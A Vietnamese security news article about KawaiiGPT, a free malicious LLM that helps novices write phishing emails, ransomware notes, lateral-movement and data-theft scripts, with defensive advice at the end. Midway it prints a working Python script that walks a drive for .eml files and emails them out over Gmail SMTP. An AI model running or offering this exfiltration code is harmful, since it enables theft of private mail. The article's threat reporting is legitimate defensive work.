KawaiiGPT, một mô hình ngôn ngữ lớn (LLM) độc hại miễn phí, đang nổi lên như một **mối đe dọa mạng** nghiêm trọng, giảm đáng kể rào cản gia nhập cho tội phạm mạng. Phát hiện lần đầu vào tháng 7 năm 2025 và hiện đã ở phiên bản 2.5, công cụ này trao quyền cho những kẻ tấn công mạng thiếu kinh nghiệm tạo ra email lừa đảo (phishing), ghi chú ransomware, và các kịch bản tấn công phức tạp.

KawaiiGPT: Dân Chủ Hóa Tội Phạm Mạng Với LLM Độc Hại

Không giống các đối thủ cạnh tranh có phí như WormGPT, vốn yêu cầu 50 USD mỗi tháng cho các khả năng tương tự, KawaiiGPT được cung cấp mã nguồn mở trên GitHub. Điều này cho phép thiết lập nhanh chóng trên Linux chỉ trong vòng chưa đầy năm phút, thu hút hàng trăm người dùng thông qua các kênh Telegram.

Khả Năng Tiếp Cận và Triển Khai Dễ Dàng

KawaiiGPT nổi bật nhờ sự đơn giản và hoàn toàn miễn phí, được lưu trữ trên các kho công khai, bỏ qua các rào cản của dark web. Các nhà nghiên cứu bảo mật ghi nhận rằng giao diện dòng lệnh (CLI) nhẹ của nó có thể triển khai dễ dàng, cho phép ngay cả những “script kiddies” cũng tạo ra các cuộc tấn công tinh vi mà không cần kỹ năng lập trình sâu.

Công cụ này che đậy ý đồ xấu bằng các phản hồi vui tươi như “Owo! okay! here you go… 😀,” nhưng vẫn tạo ra các kịch bản Python chức năng. Các kịch bản này hỗ trợ di chuyển ngang qua các mô-đun SSH **paramiko** hoặc đánh cắp dữ liệu bằng cách sử dụng **os.walk** và **smtplib**.

Tăng Tốc Chu Trình Tấn Công

Sự dễ dàng tiếp cận này đẩy nhanh các vụ xâm nhập. Kẻ tấn công có thể xác thực từ xa, leo thang đặc quyền, triển khai backdoor và đánh cắp tệp liền mạch. Hơn 500 người dùng đã đăng ký, bao gồm 180 thành viên trong một nhóm Telegram đang hoạt động tính đến đầu tháng 11 năm 2025, chia sẻ các mẹo để nâng cao tính năng tấn công của công cụ.

Kỹ Thuật Tấn Công và Khai Thác Của KawaiiGPT

KawaiiGPT được thiết kế để tạo ra các công cụ và kịch bản hỗ trợ nhiều giai đoạn của một cuộc **tấn công mạng** toàn diện.

Tạo Email Spear-Phishing Tinh Vi

Khi được yêu cầu tạo một email lừa đảo nhắm mục tiêu (spear-phishing) giả mạo một ngân hàng, KawaiiGPT tạo ra các mồi nhử thuyết phục như “Urgent: Verify Your Account Information.” Các email này liên kết đến các trang web giả mạo thu thập thông tin xác thực.

Chúng né tránh các bộ lọc email nhờ ngữ pháp hoàn hảo và ngữ cảnh chính xác, vượt xa các trò lừa đảo chất lượng thấp truyền thống.

Chỉ số thỏa hiệp (IOCs)

• URL lừa đảo mẫu: hxxps[:]//fakebankverify[.]com/updateinfo

Tự Động Hóa Tấn Công và Di Chuyển Ngang

Khả năng tạo mã của KawaiiGPT bao gồm các giai đoạn tấn công chính, tự động hóa các bước di chuyển ngang trong mạng vốn trước đây đòi hỏi chuyên môn cao. Bằng cách kết hợp các thư viện hợp pháp, các đầu ra của nó mô phỏng lưu lượng truy cập bình thường, giúp né tránh các công cụ ngăn chặn mất dữ liệu (DLP).

Quy Trình Mã Độc Ransomware Hoàn Chỉnh

KawaiiGPT có khả năng tạo ra các quy trình **mã độc ransomware** hoàn chỉnh. Điều này bao gồm việc tạo ra các ghi chú đe dọa, tuyên bố rằng các tệp đã được mã hóa bằng “mã hóa cấp quân sự”, đặt thời hạn 72 giờ và hướng dẫn các bước thanh toán bằng Bitcoin đến ví của kẻ tấn công.

Các kịch bản này mã hóa các tệp PDF bằng **AES-256**, hỗ trợ đánh cắp dữ liệu qua Tor và hướng dẫn những người mới từ giai đoạn xâm nhập đến giai đoạn tống tiền. Unit 42 của Palo Alto Networks đã quan sát thấy điều này.

Kịch Bản Đánh Cắp Dữ Liệu

Các bản demo đánh cắp dữ liệu nhắm mục tiêu vào các tệp EML trên hệ điều hành Windows, quét đệ quy các ổ đĩa để gửi các tệp đính kèm qua email một cách lén lút. Có thể tùy chỉnh để nén hoặc né tránh, những công cụ này biến các tiêu chuẩn Python thành vũ khí, cho phép thực hiện các chiến dịch nhanh chóng.

# Ví dụ về mã Python cơ bản sử dụng os.walk và smtplib (mô phỏng, không phải mã độc hoàn chỉnh)
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

def exfiltrate_file(filepath, recipient_email, sender_email, sender_password):
    msg = MIMEMultipart()
    msg['From'] = sender_email
    msg['To'] = recipient_email
    msg['Subject'] = "Dữ liệu bị rò rỉ"

    part = MIMEBase('application', 'octet-stream')
    with open(filepath, 'rb') as file:
        part.set_payload(file.read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', f"attachment; filename={os.path.basename(filepath)}")
    msg.attach(part)

    try:
        server = smtplib.SMTP_SSL('smtp.gmail.com', 465) # Ví dụ SMTP
        server.login(sender_email, sender_password)
        server.send_message(msg)
        server.quit()
        print(f"Đã gửi: {filepath}")
    except Exception as e:
        print(f"Lỗi khi gửi {filepath}: {e}")

# Tìm kiếm tệp EML trên ổ đĩa
def find_and_exfiltrate_eml_files(drive_path, recipient, sender, password):
    for root, _, files in os.walk(drive_path):
        for file in files:
            if file.endswith('.eml'):
                full_path = os.path.join(root, file)
                exfiltrate_file(full_path, recipient, sender, password)

# Cách sử dụng (CHỈ MỤC ĐÍCH MINH HỌA, KHÔNG CHẠY TRONG MÔI TRƯỜNG THỰC)
# find_and_exfiltrate_eml_files('C:\', '[email protected]', '[email protected]', 'app_password')

Tác Động và Rủi Ro An Ninh Mạng

KawaiiGPT là một ví dụ điển hình về những rủi ro sử dụng kép của AI. Nó chuyển đổi các **mối đe dọa mạng** từ những kẻ tấn công có kỹ năng cao sang số đông thông qua thương mại hóa và dân chủ hóa công cụ.

Dân Chủ Hóa Tội Phạm Mạng

Trong khi WormGPT kiếm tiền từ các công cụ **mã độc ransomware** PowerShell tiên tiến, mô hình miễn phí của KawaiiGPT mở rộng phạm vi tiếp cận, thúc đẩy các cộng đồng phi pháp. Điều này tạo ra một **mối đe dọa mạng** đáng kể cho các tổ chức và người dùng cá nhân.

Sự xuất hiện của các LLM độc hại như KawaiiGPT làm gia tăng nguy cơ **tấn công mạng** tinh vi mà không đòi hỏi nhiều chuyên môn từ kẻ tấn công. Để tìm hiểu thêm về WormGPT, bạn có thể tham khảo WormGPT AI Tool.

Thách Thức Đối Với Hệ Thống Phát Hiện

Các công cụ này khiến **mối đe dọa mạng** trở nên khó lường hơn. Những dấu hiệu truyền thống như mã kém chất lượng không còn xuất hiện, đòi hỏi các bộ lọc kháng AI, phát hiện bất thường và giám sát các lời nhắc (prompt) một cách chủ động.

Các Biện Pháp Phòng Ngừa và Thích Ứng

Các nhà bảo vệ phải thích nghi với tình hình mới để đối phó hiệu quả với **mối đe dọa mạng** liên tục.

Yêu Cầu Đối Với Hệ Thống Bảo Mật

Để giảm thiểu **mối đe dọa mạng** từ các LLM độc hại, các tổ chức cần triển khai các bộ lọc có khả năng chống AI, các hệ thống phát hiện bất thường (anomaly detection), và các cơ chế giám sát prompt. Điều này giúp nhận diện và ngăn chặn các nội dung độc hại được tạo ra một cách tinh vi.

An Toàn Thông Tin và Hợp Tác Ngành

Palo Alto Networks’ Unit 42 cảnh báo về chu kỳ tấn công bị nén, thúc giục các biện pháp bảo vệ AI có đạo đức và nỗ lực toàn cầu để phá vỡ các dịch vụ này. Việc tăng cường **an toàn thông tin** và hợp tác giữa các tổ chức là rất quan trọng để đối phó với những thách thức mới này.